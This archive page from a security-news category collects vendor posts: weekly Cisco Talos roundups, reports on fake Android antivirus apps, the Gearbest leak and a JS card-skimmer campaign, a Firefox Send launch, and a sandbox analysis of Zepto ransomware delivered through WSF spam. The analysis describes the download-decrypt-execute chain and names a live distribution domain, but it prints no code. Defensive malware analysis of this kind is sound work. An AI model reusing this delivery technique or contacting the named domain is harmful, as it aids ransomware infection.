Category Archives: Security news

Naked Security – Sophos: Monday review – the hot 23 stories of the week

From a Citrix breach to John Oliver's FCC anti-robocall campaign, and everything in between - it's weekly roundup time.





Download audio: http://feeds.soundcloud.com/stream/590301654-sophossecurity-ep-023-facebook-promises-and-google-chrome-patches.mp3

Naked Security - Sophos

Most Of Android Antivirus Apps Are Fake And Ineffective

Two-thirds of Android antivirus apps are frauds and fail to provide protection

A recent report published by an Austrian antivirus-testing lab revealed that almost two-thirds of all Android antivirus apps are fake, unsafe or ineffective.

The antivirus-testing lab, AV-Comparatives conducted research on 250 Android antivirus apps in Google Play Store against 2,000 malware samples. The group found that only 80 of the apps could detect over 30% of the 2,000 malicious samples thrown at them by the testing lab during individual tests with zero false alarms.

The study also found that antivirus apps from 138 vendors detected less than 30% of the Android malware samples, or had a relatively high false alarm rate on popular clean files from the Google Play Store.

“Less than one in 10 of the apps tested defended against all 2,000 malicious apps, while over two-thirds failed to reach a block rate of even 30 percent”, the lab said in a press release.

“The main purpose of these apps seems to be generating easy revenue for their developers, rather than actually protecting their users.”

For the extensive study, the researchers used 2,000 most common Android malware samples of 2018. Further, in order to ensure the most accurate results, researchers installed each antivirus app on physical Android devices instead of emulators and used an automated test process (developed in co-operation with the University of Innsbruck) to open a browser and download a malicious app to install it on the device.

The study showed that only 23 apps detected 100 percent of the malware samples, while 14 apps managed to achieve more than 99 percent.

“We consider those apps to be risky, that is to say, ineffective or unreliable. In some cases, the apps are simply buggy, e.g. because they have poorly implemented a third-party engine. Others detect only a handful of ancient Android malware samples, and allow any apps that contain certain strings, making them likely to pass some quick checks and thus be accepted by the app stores”, the lab said.

AV-Comparatives’ founder and CEO Andreas Clementi says, “Although the number of Android security apps on the market has increased since last year, our test shows that a smaller proportion of the available apps will actually provide effective protection. Last year, a third of the security apps we tested failed to detect even 30 percent of malicious samples; this year, that proportion rose to over two thirds.”

Clementi also warns users to avoid depending on user ratings and download counts to install an anti-virus app on their device, as those can be faked.

“User ratings in the Google Play Store might show that a security app is easy to use. However, without independent testing, users cannot be sure if its detections are genuine, or whether it has given a clean bill of health to a malicious program. Our test report lets you know which programs will protect your Android device, without false alarms,” he added.

In the last few months, Google has removed security apps from 32 vendors from the Play Store with more expected to be removed in the future, says AV-Comparatives.

You can visit the AV-Comparatives site and check out the complete list of all the apps tested with their scores and details of the methodology used.

The post Most Of Android Antivirus Apps Are Fake And Ineffective appeared first on TechWorm.

Blog | Avast EN: Gearbest Data Breach Puts Millions at Risk | Avast

White hat hackers scanning the web for system holes and data leaks stumbled upon an unsecured ElasticSearch server containing millions of Gearbest customer records. Gearbest is an Amazon-style e-commerce site with a focus on tech and Chinese brands. It ships to over 250 countries and publishes 18 subdomains in different languages. Under parent company Globalegrow, Gearbest is a billion-dollar business, but while its privacy policy states that the company encrypts any and all customer info it retains, the unsecured server found online proves that this is not true. Hundreds of thousands of customers are putting themselves at risk daily, adding their info to the growing repository of customer data accumulating for anyone to access.



Blog | Avast EN

Cyber Security Week in Review (March 15)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • The U.S. warned Germany that using Huawei’s 5G technology could result in a drop in information-sharing. American officials have consistently criticized the use of the Chinese company’s technology, saying they pose a national security risk. If other countries were to use Huawei’s 5G network, the U.S. says it would fear its intelligence was not being kept safe. 
  • It is reported that a hacking group stole an estimated six terabytes of data from the Citrix enterprise network. The company said it took steps to contain this data breach after it was alerted by the FBI, but thousands of customers’ information could still be at risk. It is not yet known what the nature of the information taken was.
  • Adobe fixed multiple remote code execution vulnerabilities in Photoshop and Digital Editions. The company released its monthly security update earlier this week. Two of the vulnerabilities were classified as critical, as an attacker could exploit them to execute code under the context of the current user.

From Talos


  • A new point-of-sale malware known as “GlitchPOS” has popped up on some online marketplaces. The malware is easy enough to install and use that virtually any user could buy their way into setting up their own botnet. We believe with high confidence that this is not the first malware created by this actor.
  • Microsoft released its monthly security update earlier this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 64 vulnerabilities, 17 of which are rated “critical,” 45 that are considered “important” and one “moderate” and “low” vulnerability each. This release also includes two critical advisories — one covering security updates to Adobe Flash Player and another concerning SHA-2.
  • CleanMyMac X contains a privilege escalation vulnerability in its helper service due to improper updating. The application fails to remove the vulnerable components upon upgrading to the latest version, leaving the user open to attack. CleanMyMac X is an all-in-one cleaning tool for Macs from MacPaw.

The rest of the news


  • Video app TikTok paid a $5.7 million fine to the Federal Trade Commission this week as part of a settlement. The FTC rules that the app, which allows users to upload short videos of them performing songs, improperly handled the data of users who are under the age of 13.
  • Two U.S. Senators introduced a new bill that would overhaul the country’s child privacy laws. The new bill would give parents complete control over their children's data online, and even allow them to completely erase information from certain websites. It would also ban targeted ads toward anyone under the age of 13.
  • Security researchers discovered a critical flaw in Switzerland’s new voting system that would allow attackers to manipulate votes. The group is now urging the Swiss government to halt the rollout of the online system.
  • Social media hackers are stepping up their activity as Brexit votes continue in the U.K. Researchers discovered an uptick in fake accounts that are spreading pro-Brexit sentiment over the past several weeks.
  • The U.S.’s Office of the Inspector General says NASA’s information security program contains several critical vulnerabilities. A new report states that the space agency could be open to an attack from a nation-state actor.


Group-IB : payment data of thousands of customers of UK and US online stores could have been compromised




Moscow, 14.03.2019 – Group-IB, an international company that specializes in preventing cyberattacks, has uncovered a malicious code designed to steal customers’ payment data on seven online stores in the UK and the US. The injected code has been identified as a new JavaScript Sniffer (JS Sniffer), dubbed by Group-IB as GMO.

Group-IB Threat Intelligence team first discovered the GMO JS Sniffer on the website of the international sporting goods company FILA UK, which could have led to the theft of payment details of at least 5,600 customers for the past 4 months.

Do your payments have the sniffles?

Most recent breaches similar to this include British Airways and Ticketmaster which were first analyzed by RiskIQ research team, where cybercriminals managed to compromise personal information of thousands of travelers and concert goers with a few of lines of code. British Airways and Ticketmaster websites were infected with JS Sniffers, a type of malicious code injected into a victim’s website designed to steal a consumer’s personal data including payment card details, names, credentials etc.

FILA UK website (fila.co[.]uk) became cybercriminals’ new major target on the UK market . GMO JS Sniffer has also been discovered on 6 other websites of US-based companies. This type of attack is especially dangerous given that it can be applied to almost any e-commerce site around the world. Group-IB made multiple attempts to alert FILA, which was known to be impacted by GMO. Six other websites affected by this JS Sniffer were notified upon discovery as well. Group-IB team has also reached out to local authorities in the UK and the US to conduct outreach.

Group-IB’s Threat Intelligence team first discovered GMO on the FILA UK website. The malicious code was detected in early March 2019. In the course of further research it was revealed that GMO JS Sniffer has presumably been collecting customer payment data since November 2018. According to Alexa.com, the number of fila.co[.]uk unique monthly visitors is estimated at around 140k per month.

According to IRP, UK market research firm, a minimum conversion into purchase for fashion and clothing ecommerce is equal to 1%. Using very conservative estimates, payment and personal details of at least 5,600 customers could have been stolen by cybercriminals – everyone who has purchased items on fila.co.uk since November 2018 has potentially had their details compromised. Typically, after customer data is stolen, it is usually resold on underground cardshops. Another scheme of cashing out involves the use of compromised cards to buy valuable goods, e.g. electronics, for onward sale.

Mozilla introduces ‘Firefox Send’, a free and encrypted file transfer service

Mozilla’s encrypted file-transfer service ‘Firefox Send’ is now available to all

Mozilla yesterday announced ‘Firefox Send’ – a free encrypted file-transfer service – that is now available for everyone. Firefox Send is a website that allows users to transfer large files to other users from any web browser free of charge.

“We know there are several cloud sharing solutions out there, but as a continuation of our mission to bring you more private and safer choices, you can trust that your information is safe with Send,” wrote Nick Nguyen, Mozilla’s Vice President of Product Strategy. “As with all Firefox apps and services, Send is Private By Design, meaning all of your files are protected, and we stand by our mission to handle your data privately and securely.”

Here’s how Firefox Send works:

To use Firefox Send, just open the website (send.firefox.com) in a web browser, click the “select files to upload” button or drag and drop whatever files you would like to share into the browser window. Then click upload and your file will be sent to Mozilla’s server. You will receive a download link that you can send to the recipient, which will allow them to download your file.

Anyone can share file sizes up to 1GB without logging in. However, you can upload files up to 2.5GB in size if you sign up for a free Firefox account, Mozilla said.

You can set to have the download link expire after a certain period of time, or after a certain number of downloads. Currently, Firefox Send allows links to remain for as long as 7 days or 100 downloads. At present, it is mandatory for you to choose both a timeframe and a download limit. The file link will expire depending on what comes first.

“By default, files are stored for a maximum of either 24 hours or 7 days. If you choose a download cap, the file can be deleted from our server sooner,” said Mozilla while explaining how it handles files uploaded to Send in its privacy document.

Even though the files are encrypted, you are also given the option to password-protect your private file link for an extra layer of security. You can either upload one file at a time or multiple files at once, which Firefox Send will automatically assemble in one big ZIP file.

Firefox Send is currently available through the send.firefox.com website. Also, a Firefox Send for Android app is in the works and will be available in beta later this week.

The post Mozilla introduces ‘Firefox Send’, a free and encrypted file transfer service appeared first on TechWorm.

Cyber Security Week in Review (March 8)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week

  • Chinese tech company Huawei is suing the U.S. government. The company alleges that the federal government violated the Constitution when it banned government agencies from buying Huawei software. The two sides have been locked in a war of words over the past year as U.S. officials raise allegations of spying and security concerns against Huawei.
  • Cisco disclosed 23 vulnerabilities affecting the NX-OS software that could put some switches at risk. The most critical vulnerability, which received a CVSS score of 8.6, lies in the Lightweight Directory Access Protocol (LDAP) in Cisco FXOS and NX-OS. An attacker could exploit this bug to gain the ability to restart the device, resulting in a denial of service. Snort rules 49334 - 49336 and 49350 can protect you from these vulnerabilities.
  • The National Security Agency released its reverse-engineering tool, Ghidra, to the public. At the RSA security conference, the agency made the software open source. While there are many reverse-engineering tools on the market, the NSA has spent years refining Ghidra and it’s largely believed one of the most sophisticated decompilers available. 

From Talos

  • Information security and operational security teams need to work together to protect IoT. That was the main takeaway from Cisco’s keynote at the RSA conference earlier this week. Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, the head of Cisco’s internet-of-things business group, said that IoT devices have become so entrenched in our society that it’s become more important now than ever to secure them. You can watch a replay of the address here
  • There are three vulnerabilities in Pixar Renderman that could allow an attacker to elevate their privileges to root. Renderman is a rendering application used in animation and film production produced by Pixar, a well-known film studio. When installing the application, a helper tool is installed and launched as root. This service continues to listen even after installation is complete. These vulnerabilities lie in the `Dispatch` function of this helper tool.

Malware roundup

  • A new, layered malware has popped up on the popular Pirate Bay torrenting website. Known as PirateMatryoshka, the trojan disguises itself as a legitimate torrent. Once downloaded, it has numerous layers to it and acts as a downloader to several other malicious programs. 
  • A relatively unknown threat group known as “Whitefly” is allegedly behind an attack on Singapore’s health care database. Security researchers say the group was behind the exposure of 1.5 million patients’ records in July, most likely using DLL load-order attacks.
  • “Scarlett Widow,” a hacking group believed to be based out of Nigeria, recently started a new wave of attacks. The actor has sent several malicious to K-12 schools and non-profits, including the Boy Scouts of America. So far the group is believed to have information on 30,000 individuals from 13,000 organizations across 13 different countries. 

The rest of the news

  • More than 300 million private messages in China were exposed on the internet. It is widely believed that the messages, which were transmitted on secure messaging apps, had been collected by the Chinese government. The database made personal identities searchable by anyone who found the IP address. 
  • U.S. Cyber Command carried out an offensive operation against a U.S. Russian troll farm last year. The attack targeted hacking groups known for spreading misinformation, specifically trying to shut them down on the day of the 2018 midterm elections in the U.S. 
  • A new Senate report says Equifax neglected proper cybersecurity practices for years. The credit reporting agency was the victim of a massive cyber attack in 2017 that led to the exposure of 145 million Americans’ personal information. The report states that the attack could have been avoided had the company followed “widely agreed upon” cybersecurity practices. 


Cyber Security Week in Review (March 1)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Drupal patched a “highly critical” vulnerability that attackers exploited to deliver cryptocurrency miners and other malware. Some field types in the content management system did not properly sanitize data from non-form sources, which allowed an attacker to execute arbitrary PHP code. Users need to update to the latest version of Drupal to patch the bug. Snort rule 49257 also protects users from this vulnerability.
  • Cryptocurrency mining tool Coinhive says it’s shutting down, but not due to malicious use. Attackers have exploited the tool for months as part of malware campaigns, stealing computing power from users to mine cryptocurrencies. However, the company behind the miner says it’s shutting down because it’s no longer economically viable to run. Snort rules 44692, 44693, 45949 - 45952, 46365 - 46367, 46393, 46394 and 47253 can protect you against the use of Coinhive. 
  • Several popular apps unknowingly share users’ personal information with Facebook. In many cases, this can include personal health information, including females’ menstruation cycle, users’ heart rate and recent home buying purchases. The data is sent to Facebook even if the user doesn’t have a Facebook profile. 

From Talos


  • Attackers are increasingly going after unsecured Elasticsearch clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines.
  • The latest Beers with Talos podcast covers the importance of privacy. Special guest Michelle Dennedy, Cisco’s chief privacy officer, talks about recent initiatives the company is taking on and how other organizations can do better. 

Vulnerability roundup


  • A flaw in the Ring doorbell could allow an attacker to spy on users’ homes and even inject falsified video. The vulnerability could open the door for a man-in-the-middle attack against the smart doorbell app since the sound and video recorded by the doorbell is transmitted in plaintext. 
  • Cisco disclosed multiple vulnerabilities in a variety of its products, including severe bugs in routers. The company urged users of its firewall routers and VPN to patch immediately Thursday, warning against a remote code execution vulnerability. There’s also a certificate validation vulnerability in Cisco Prime Infrastructure that could allow an attacker to perform a man-in-the-middle attack against the SSL tunnel between Cisco’s Identity Service Engine and Prime Infrastructure. Snort rule 49240 protects users from the Prime Infrastructure vulnerability. 
  • New flaws in 4G and 5G could allow attackers to track users’ location and intercept phone calls. A new research paper discloses what is believed to be the first vulnerabilities that affect both broadband technologies. 

The rest of the news


  • A new service from Cisco Duo launched a new product recently to scan Google Chrome extensions. CRXcavator provides customers and users by scanning the Chrome store and then delivering reports on different extensions based on their permissions required and potential use of those permissions. 
  • Google is under fire for allegedly forgetting to inform users of a microphone inside of its Nest smart hub. While the company says it was never supposed to be a secret, users, security researchers and even politicians now are questioning why the microphone was installed in the first place. 
    • Talos Take: "To be clear, because some news outlets have reported this microphone as being present in the Nest THERMOSTAT.  It is NOT present in the thermostat, it’s present in the Smart Hub, which is the centerpiece of their home security solution," Joel Esler, senior manager, Communities Division.


Cyber Security Week in Review (Feb. 22)



Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • U.S. officials charged a former member of the Air Force with defecting in order to help an Iranian cyber espionage unit. The Department of Justice say the woman collected information on former colleagues, and then the Iranian hackers attempted to target those individuals and install spyware on their computers.
  • The U.S. Department of Justice is dismantling two task forces aimed at protecting American elections. The groups were originally created after the 2016 presidential election to prevent foreign interference but after the 2018 midterms, the Trump administration shrunk their sizes significantly. 
  • Facebook and the U.S. government are closing in on a settlement over several privacy violations. Sources familiar with the discussions say it will likely result in a multimillion-dollar fine, likely to be the largest the Federal Trade Commission has ever imposed on a technology company. 

From Talos


  • There’s been a recent uptick in the Brushaloader infections. While the malware has been around since mid-2018, this new variant makes it more difficult than ever to detect on infected machines. New features include the ability to evade detection in sandboxes and the avoidance of anti-virus protection. 
  • New features in WinDbg makes it easier for researchers to debug malware. A new JavaScript bridge brings WinDbg in line with other modern programs. Cisco Talos walks users through these new features and shows off how to use them. 

Malware roundup


  • Google says it’s stepping up its banning of malicious apps. The company says it’s seen a 66 percent increase in the number of apps its banned from the Google Play store over the past year. Google says it scans more than 50 billion apps a day on users’ phones for malicious activity. 
  • A new campaign using the Separ malware is attempting to steal login credentials at large businesses. The malware uses short scripts and legitimate executable files to avoid detection. 
  • A new ATM malware called "WinPot" turns the machines into "slot machines." This allows hackers to essentially gamify ATM hacking, randomizing how much money the machine dispenses. 

The rest of the news


  • The U.S. is reviving a secret program to carry out supply-chain attacks against Iran. The cyber attacks are targeted at the country’s missile program. Over the past two months, two of Iran’s efforts to launch satellites have failed within minutes, though it’s difficult to assign those failures to the U.S. 
  • Australia says a “sophisticated state actor” carried out a cyber attack on its parliament. The ruling Liberal-National coalition parties say their systems were compromised in the attack. Since then, the country says it’s put “a number of measures” in place to protect its election system. 
  • Cisco released security updates for 15 vulnerabilities. Two critical bugs could allow attackers to gain root access to a system, and a third opens the door for a malicious actor to bypass authentication altogether. 
  • Facebook keeps a list of users that it believes could be a threat to the company or its employees. The database is made up of users who have made threatening posts against the company in the past. 


Cyber Security Week in Review (Feb. 15, 2019)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Email provider VFEmail says it suffered a “catastrophic” cyber attack. The company warned that about 18 years’ worth of customers’ emails may be permanently gone. “Every file server is lost, every backup server is lost. Strangely, not all VMs shared the same authentication, but all were destroyed. This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail representatives said in a statement. 
  • Russia is considering isolating itself from the global internet. The Kremlin is experimenting with a new practice of only routing the country’s web requests through the country and not internationally. The country will run a test later this year in an effort to test its cyber defenses.
  • Apple released fixes for multiple security flaws in iOS. Two of the vulnerabilities, which were discovered by Google’s threat research team, were being exploited in the wild. The bugs could allow an attacker to escalate their privileges and eventually completely take over a device. 

From Talos


  • Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 69 vulnerabilities, 20 of which are rated “critical,” 46 that are considered “important” and three that are “moderate.” This release also includes a critical security advisory regarding a security update to Adobe Flash Player. 
  • Adobe released security updates for several of its products, including Flash and Acrobat Reader. Cisco Talos specifically discovered a critical remote code execution vulnerability in Adobe Acrobat Reader DC. An attacker could cause a heap overflow by tricking the user into opening a specially crafted PDF, which would allow the attacker to gain code execution privileges. 
  • A new tool from Talos can allow you to study the effect of cyber attacks on oil pump jacks. We released a 3-D printed, small-scale model of a pump jack that can be “hacked” from a smartphone, causing it to eventually overheat. We’ll also be taking this exhibit on the road over the course of the year. 

Malware roundup


  • A new variant of the Astaroth trojan is targeting Brazil via multiple spam campaigns. Once infected, the malware can steal users’ personal information and uses several deobfuscation techniques to make it more difficult to detect. The spam emails are also hitting users in parts of Europe.
  • Credit unions across the U.S. received phishing emails last week targeting anti-money laundering efforts. The phony emails claim to have information on unauthorized wire transfers and ask them to open a PDF that displays the alleged transaction and contains a link to a malicious web page. The attackers used information that’s believed to only be available to the National Credit Union Administration.
  • Google removed a cryptocurrency-stealing malware from its store. The malicious app disguised itself as the legitimate MetaMask service. Once downloaded, it would steal login credentials to steal users’ Ethereum funds. 

The rest of the news


  • Blockchain technology could be useful in detecting deepfake videos, specifically in police body cameras. A new tool called Amber Authenticate runs in the background of cameras to record the hashes of the video, which would appear different a second time if the user had edited the video. All of these results are recorded on the public blockchain.
  • India requested Facebook give its government a backdoor into the WhatsApp messaging app. This would require Facebook to give the government access to users’ encrypted messages that were originally secret.
  • Two U.S. senators are requesting an investigation into foreign VPN services. The senators say the companies could pose a national security risk.  


Zepto Ransomware Packed into WSF Spam

ThreatTrack Labs has recently observed a surge of spam containing a zip attachment with a WSF (Windows Scripting File) to deliver Zepto ransomware. This tactic is a change from the common JavaScript and macro documents being spammed previously.

Here are actual emails featuring familiar social engineering tactics:

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

ransomware spam infected WSF attachment

The zip attachments contain the WSF.

infected WSF file

 

An Interactive Analysis with ThreatAnalyzer

To see what we’re dealing with, we turned to ThreatTrack’s malware analysis sandbox ThreatAnalyzer.

We extracted the WSF, submitted it to ThreatAnalyzer and generated the following threat analysis:

Zepto ransomware analysis

Since this is a script, we are more concerned with the call tree from WScript.exe. One notable result, encircled above, is the number of modified files. This most indicates a high likelihood that this could either be a virus or ransomware. And considering the proliferation of ransomware attacks lately, that’s our biggest concern.

There are two captured screen shots from our analysis.

Zepto ransomware analysis infection screen

Expanding the MODIFIED FILES shows this result.

ransomware modified files

The files affected are renamed with a “.zepto” filename extension.

Given the screenshot and Modified Files artifacts, we can confidently say that this is a variant of the Zepto ransomware.

The WSF Script Behavior

Selecting C:\Windows\System32\WScript.exe (3388) shows results of the behaviors done by the WSF alone.

ransomware sandbox analysis

ransomware sandbox analysis

It shows that the script created two files and made an HTTP connection to mercumaya.net.

Let’s look at the two files in the Temp folder.

This is the binary view of UL43Fok40ii file

Zepto ransomware encrypted code

This is the UL43Fok40ii.exe file.  A complete PE file format.

ransomware code processes analysis

Having only a difference of 4 bytes in size of 208,008 bytes and 208,004 bytes suggests that the file without the .exe filename extension was decrypted to form the PE executable file. Afterwards, the PE executable was run by the WSF script with the argument: “321”.

ransomware sandbox analysis

 

Expanding the Network connections.

ransomware sandbox analysis

ransomware sandbox analysis

With the com.my suffix from the resolved host, the server seems to be located in Malaysia.

The HTTP header also indicates that the Content-Length was 208,008 bytes. This is the same file size of the encrypted file.

The WSF file executed by the WScript.exe simply downloaded then decrypted a Windows PE file then executed it.

The Downloaded Executable PE file

Now we turn our focus on the behavior of the executable file UL43Fok40ii.exe.

Zepto ransomware sandbox analysis

  • Posted some info to a server somewhere in Ukraine.
  • Accessed hundreds of files.
  • Executed the default browser (Chrome was set as the default browser)
  • Deleted a file using cmd.exe

ransomware sandbox analysis

  • Connected to shares
  • Dropped the ransom instructions (_HELP_instructions.html). For every folder where a file got encrypted for ransom, a copy of the _HELP_instructions.html is created.

ransomware sandbox analysis help me

  • Created 10 threads

The data posted to the Ukraine site is encrypted. Most likely this contains the id and key used to encrypt the files.

i

TA displays the raw data in hexadecimal form. A partially converted version of the raw data is shown below:

j1

 

This malware also renamed a lot of files. This is the behavior that encrypts files while renaming the file using a GUID filename with a “.zepto” filename suffix.

k

In the manner of searching files, it primarily targets the phone book file before traversing from the root directory of the drive.

l

Also some notable files that were created. The captured screenshot is the contents of the _HELP_instructions.bmp file.

m

This malware sample attempts to move its running executable to a file in the Temp folder.

q

With Chrome set as the default browser,  the malware opens the file _HELP_instructions.html that it previously created in the Desktop.  It also, deletes the malware copy from the Temp folder probably a part of it’s clean up phase.

o

Here’s what _HELP_instructions.html looks like when opened in a browser.

p

The process call tree under Chrome.exe are most likely invoked by the browser and not part of this malware.

Prevent Ransomware

Syndicates behind today’s ransomware like Zepto are aggressively finding various ways of infiltrating businesses and government organizations alike. In this case, they attacked by using Windows Scripting Files in hopes to pass through email gateways that don’t block WSF files in attachments.

To protect your organization, deploy solutions that protect you from sophisticated and pervasive threats like ransomware, including advanced endpoint protection like VIPRE Endpoint Security, a malware behavior analysis tool like ThreatAnalyzer, and solutions to detect and disrupt active cyber attacks like ThreatSecure. And regularly back up all your critical data.

VIPRE antivirus detections for this threat include Trojan.Locky.AX and Trojan.Win32.Generic!BT.

The post Zepto Ransomware Packed into WSF Spam appeared first on ThreatTrack Security Labs Blog.